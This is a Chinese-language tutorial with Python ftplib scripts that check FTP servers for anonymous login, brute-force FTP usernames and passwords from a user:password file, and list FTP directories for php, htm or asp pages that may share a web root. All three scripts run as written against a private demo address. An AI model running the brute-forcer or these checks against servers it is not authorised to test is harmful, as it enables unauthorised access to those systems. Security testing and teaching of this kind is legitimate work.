利用ftplib模块
很简单:先用 ftplib.FTP(hostname) 建立连接,再调用 login();匿名访问时用户名是 anonymous,密码填一个邮箱地址即可。
# -*- coding: UTF-8 -*-
import ftplib
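def anonLogin(hostname):
    """Report whether the FTP server at ``hostname`` accepts anonymous login.

    Connects with ``ftplib.FTP``, attempts to log in as ``anonymous`` with an
    e-mail address as the password, prints the outcome and returns it.  A
    True result is a finding to follow up: anonymous access should be
    disabled unless the server is meant to be public.

    Args:
        hostname: Host name or IP address of the FTP server to check.

    Returns:
        True if the anonymous login was accepted, False on any failure
        (name resolution, connection, timeout or a rejected login).
    """
    ftp = None
    try:
        # Bound the connect and every reply so an unresponsive host cannot
        # hang the check indefinitely.
        ftp = ftplib.FTP(hostname, timeout=10)
        ftp.login('anonymous', 'Recar@Recar.com')
        print('\n[*] ' + str(hostname) + ': FTP Anonymous Logon Succeeded.')
        ftp.quit()
        return True
    except Exception:
        # Deliberately broad: whatever went wrong, the server was not shown
        # to accept anonymous logins from here.
        print('\n[-] ' + str(hostname) + ': FTP Anonymous Logon Failed.')
        return False
    finally:
        # A rejected login leaves the control connection open; close() is
        # safe to call again after quit().
        if ftp is not None:
            ftp.close()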
# Demonstration target: an address in the private 192.168.0.0/16 range.
host = '192.168.150.137'
# Runs at module level, so the check fires as soon as the script is executed.
anonLogin(host)
加上optparse方便些
# -*- coding: UTF-8 -*-
import ftplib
import optparse
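def anonLogin(hostname):
    """Report whether the FTP server at ``hostname`` accepts anonymous login.

    Connects with ``ftplib.FTP``, attempts to log in as ``anonymous`` with an
    e-mail address as the password, prints the outcome and returns it.  A
    True result is a finding to follow up: anonymous access should be
    disabled unless the server is meant to be public.

    Args:
        hostname: Host name or IP address of the FTP server to check.

    Returns:
        True if the anonymous login was accepted, False on any failure
        (name resolution, connection, timeout or a rejected login).
    """
    ftp = None
    try:
        # Bound the connect and every reply so an unresponsive host cannot
        # hang the check indefinitely.
        ftp = ftplib.FTP(hostname, timeout=10)
        ftp.login('anonymous', 'Recar@Recar.com')
        print('\n[*] ' + str(hostname) + ': FTP Anonymous Logon Succeeded.')
        ftp.quit()
        return True
    except Exception:
        # Deliberately broad: whatever went wrong, the server was not shown
        # to accept anonymous logins from here.
        print('\n[-] ' + str(hostname) + ': FTP Anonymous Logon Failed.')
        return False
    finally:
        # A rejected login leaves the control connection open; close() is
        # safe to call again after quit().
        if ftp is not None:
            ftp.close()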
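def main():
    """Parse ``-H <target host>`` and run the anonymous-login check on it.

    When no host is given, prints the parser's usage string and returns
    without contacting anything.
    """
    parse = optparse.OptionParser("usage %prog -H <target host>")
    parse.add_option('-H', dest='tgtHost', type='string',
                     help='specify target host')
    options, _args = parse.parse_args()
    # Identity test: None is a singleton, and ``== None`` can be fooled by
    # objects that override __eq__.
    if options.tgtHost is None:
        print(parse.usage)
        return
    anonLogin(options.tgtHost)


if __name__ == '__main__':
    main()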
那么可以写一个用户名密码爆破的工具:字典里包含 anonymous 的话,就可以同时检测是否允许匿名登录。
# -*- coding: UTF-8 -*-
import ftplib
import optparse
from threading import Thread
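def bruteLogin(hostname, passwordFile):
    """Try each ``user:password`` pair from a file against an FTP server.

    Every pair is printed before it is tried, and the accepted pair is
    printed again on success, so the output contains credentials in clear
    text.

    Args:
        hostname: Host name or IP address of the FTP server.
        passwordFile: Path to a text file with one ``user:password`` pair
            per line.

    Returns:
        ``(username, password)`` for the first pair the server accepts, or
        ``(None, None)`` if no pair in the file is accepted.
    """
    with open(passwordFile, 'r') as f:
        for line in f:
            # Drop the line ending (LF or CRLF) and split on the first colon
            # only, so the password part is kept whole.
            username, sep, password = line.rstrip('\r\n').partition(':')
            if not sep:
                # Blank or malformed line: skip it rather than abort the run
                # with an IndexError.
                continue
            print("[+] Trying: " + username + ":" + password)
            ftp = None
            try:
                # One control connection and one login exchange per pair, so
                # each rejected pair is a separate failed login from the
                # server's point of view -- which is what login-failure
                # logging and lockout policies key on.
                ftp = ftplib.FTP(hostname)
                ftp.login(username, password)
                print('\n[+] ' + str(hostname) + ': FTP Logon Succeeded: '
                      + username + ":" + password)
                ftp.quit()
                return (username, password)
            except Exception:
                # Best effort, as in the original: a rejected login or a
                # connection error just moves on to the next pair.
                pass
            finally:
                # Do not leave a half-open session behind for every failed
                # pair; close() is safe after quit().
                if ftp is not None:
                    ftp.close()
    print('\n[-] Could not brute force FTP credentials.')
    return (None, None)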
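def main():
    """Parse ``-H`` and ``-P`` and run the credential check.

    ``-P`` is handed to ``bruteLogin`` as the path of the credentials file
    (one ``user:password`` pair per line), even though the option's help
    text calls it a password.  When either option is missing, prints the
    parser's usage string and returns without contacting anything.
    """
    parse = optparse.OptionParser("usage %prog -H <target host> -P <target password>")
    parse.add_option('-H', dest='tgtHost', type='string',
                     help='specify target host')
    parse.add_option('-P', dest='tgtPassword', type='string',
                     help='specify target password')
    options, _args = parse.parse_args()
    # Logical ``or`` with identity tests replaces the bitwise ``|`` on two
    # ``== None`` comparisons.
    if options.tgtHost is None or options.tgtPassword is None:
        print(parse.usage)
        return
    bruteLogin(options.tgtHost, options.tgtPassword)


if __name__ == '__main__':
    main()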
扫描 FTP 服务器的目录列表,检查其中是否有 web 服务的默认页面(php、asp、html 等)。
# -*- coding: UTF-8 -*-
#这个版本设置的是利用的匿名登陆。当然用之前的爆破脚本爆破出用户名和密码在利用这个
import ftplib
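def returnDefault(ftp):
    """List the current FTP directory and return names that look like web pages.

    A hit suggests the FTP directory overlaps a web root; verify that the
    FTP account has no write access there.

    Args:
        ftp: A connected, logged-in ``ftplib.FTP`` object (any object with an
            ``nlst()`` method that returns file names works).

    Returns:
        The list of names containing ``.php``, ``.htm`` or ``.asp``
        (case-insensitive), possibly empty; ``None`` if the directory
        listing itself failed.
    """
    try:
        dirlist = ftp.nlst()
    except Exception:
        # Not a bare ``except:`` -- Ctrl-C and SystemExit must still get
        # through.
        print('[-] Could not list directory contents.')
        print('[-] Skipping To Next Target.')
        return None
    retList = []
    for filename in dirlist:
        fn = filename.lower()
        # Substring match: '.htm' also covers '.html', and names such as
        # 'index.php.bak' are reported too.
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print('[+] Found default page: ' + filename)
            retList.append(filename)
    # Report "nothing found" once, and only when nothing was found.
    if not retList:
        print('[-] Sorry it`s not have web defaulte page')
    return retList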
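# Demonstration target: an address in the private 192.168.0.0/16 range,
# logged in to anonymously with an empty password.
host = '192.168.150.137'
ftp = ftplib.FTP(host)
try:
    ftp.login('anonymous', '')
    returnDefault(ftp)
    ftp.quit()
finally:
    # Release the control connection even when login or the listing fails;
    # close() is safe after quit().
    ftp.close()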